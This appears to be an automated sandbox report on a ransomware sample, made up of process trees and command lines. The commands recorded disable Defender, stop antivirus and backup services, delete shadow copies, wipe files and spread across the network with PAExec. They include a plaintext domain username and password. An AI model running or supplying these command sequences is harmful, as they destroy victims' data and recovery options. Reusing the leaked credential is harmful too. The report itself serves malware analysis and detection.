976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

pid	process
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 976 wrote to memory of 1784	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 1784	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 3968	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 3968	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 2508	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 2508	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 3600	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 3600	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 736	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 736	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 3136	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	sc.exe
PID 976 wrote to memory of 3136	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	sc.exe
PID 976 wrote to memory of 2620	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 2620	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 3144	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 3144	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 4108	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 4108	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 4240	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 4240	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 4344	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 4344	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 4464	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	icacls.exe
PID 976 wrote to memory of 4464	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	icacls.exe
PID 976 wrote to memory of 4568	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	taskkill.exe
PID 976 wrote to memory of 4568	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	taskkill.exe
PID 976 wrote to memory of 4636	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4636	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4680	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4680	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4716	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4716	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4772	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4772	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4852	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4852	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4904	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4904	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4968	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4968	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 5012	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 5012	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 5072	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 5072	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 4636 wrote to memory of 5096	4636	net.exe	net1.exe
PID 4636 wrote to memory of 5096	4636	net.exe	net1.exe
PID 976 wrote to memory of 4152	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4152	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 4680 wrote to memory of 4256	4680	net.exe	net1.exe
PID 4680 wrote to memory of 4256	4680	net.exe	net1.exe
PID 976 wrote to memory of 4472	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 4472	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	Conhost.exe
PID 976 wrote to memory of 4884	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 976 wrote to memory of 4884	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	powershell.exe
PID 4716 wrote to memory of 4780	4716	net.exe	net1.exe
PID 4716 wrote to memory of 4780	4716	net.exe	net1.exe
PID 976 wrote to memory of 4352	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 4352	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 4772 wrote to memory of 5124	4772	net.exe	net1.exe
PID 4772 wrote to memory of 5124	4772	net.exe	net1.exe
PID 976 wrote to memory of 5176	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 5176	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 5224	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe
PID 976 wrote to memory of 5224	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  PID:3968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:3136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4568
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:5096
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5236
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:5132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6788
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:6892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:2424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:5472
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4856
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.18 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:6564
- C:\Users\Admin\AppData\Local\Temp\k4gt3gok.exe
  "C:\Users\Admin\AppData\Local\Temp\k4gt3gok.exe" \10.10.0.18 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4172
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:6220
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6196
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6188
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6172
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6160
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6152
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6124
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5372
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5284
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4860
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6108
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4824
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6060
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6088
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6032
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4944
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5024
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5948
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:5764
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4644
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5816
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5804
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5564
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5548
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6096
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6036
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5540
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4152
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:5072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5012
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4968
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4680
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:5996
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:7140
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:6740
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:6684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
  2⤵
  PID:6752
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:6052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:6116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:3916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:6656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:6936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:7064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:6500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:5408

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:6276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:6260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:4640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:7056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:6304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:5276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:1524

C:\Windows\PAExec-4312-RJMQBVDN.exe
C:\Windows\PAExec-4312-RJMQBVDN.exe -service
1⤵
PID:6432
- C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
  2⤵
  - Executes dropped EXE
  - Windows security modification
  - Modifies data under HKEY_USERS
  PID:380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:6736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:6544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:4684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    - Modifies data under HKEY_USERS
    PID:5028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:5244
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:6036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:5408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    - Modifies data under HKEY_USERS
    PID:6992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    - Modifies data under HKEY_USERS
    PID:6604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    - Modifies data under HKEY_USERS
    PID:6396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:7128
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:4536
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:6556
